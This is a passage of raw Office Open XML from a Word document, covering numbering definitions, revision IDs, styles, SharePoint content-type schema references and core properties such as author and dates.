  <w:num w:numId="20" w16cid:durableId="829490758">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="134952833">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1658410923">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1419980330">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1938978883">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="189111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D2"/>
    <w:rsid w:val="0001079D"/>
    <w:rsid w:val="00083FDB"/>
    <w:rsid w:val="00180A80"/>
    <w:rsid w:val="001D65D1"/>
    <w:rsid w:val="00275B01"/>
    <w:rsid w:val="00363DC0"/>
    <w:rsid w:val="003B3BB1"/>
    <w:rsid w:val="004D5DA1"/>
    <w:rsid w:val="004D7189"/>
    <w:rsid w:val="005B651E"/>
    <w:rsid w:val="005D46D3"/>
    <w:rsid w:val="00633EB0"/>
    <w:rsid w:val="00653BD1"/>
    <w:rsid w:val="00661716"/>
    <w:rsid w:val="00682700"/>
    <w:rsid w:val="00693A11"/>
    <w:rsid w:val="006A68C2"/>
    <w:rsid w:val="006E11D2"/>
    <w:rsid w:val="00805906"/>
    <w:rsid w:val="0081598B"/>
    <w:rsid w:val="00C06EF5"/>
    <w:rsid w:val="00D4215D"/>
    <w:rsid w:val="00DB405D"/>
    <w:rsid w:val="00DB4B7F"/>
    <w:rsid w:val="00E01E33"/>
    <w:rsid w:val="00FB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441DC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{707C9D97-510A-4F1C-807F-038ECFE3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1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1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8B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00815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CE0301A4D16409281FDC06A4CB2C3" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="275c9a186c0b2ab52fd3ef549fad1568">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="171a2b1f-8c3d-4fde-95e1-78c5ca98cc98" xmlns:ns4="a51d25b9-418e-448c-bb4e-49f5c1985515" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a590c400db1af369f37949d2e3222e0e" ns3:_="" ns4:_="">
    <xsd:import namespace="171a2b1f-8c3d-4fde-95e1-78c5ca98cc98"/>
    <xsd:import namespace="a51d25b9-418e-448c-bb4e-49f5c19855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2b1f-8c3d-4fde-95e1-78c5ca98c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25b9-418e-448c-bb4e-49f5c1985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1a2b1f-8c3d-4fde-95e1-78c5ca98cc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877E-70A4-4AF2-A445-13028C4D3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2b1f-8c3d-4fde-95e1-78c5ca98cc98"/>
    <ds:schemaRef ds:uri="a51d25b9-418e-448c-bb4e-49f5c1985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030AE-B082-435C-B51D-8C1644553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C533B-6ECA-4B7B-9423-E89EB8458587}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="171a2b1f-8c3d-4fde-95e1-78c5ca98cc98"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FAE8D59B-4369-408F-979F-1F6DDD3F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4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Shahbaz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hafsah Shahbaz</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-03T15:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-0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CE0301A4D16409281FDC06A4CB2C3</vt:lpwstr>
  </property>
</Properties>
</file>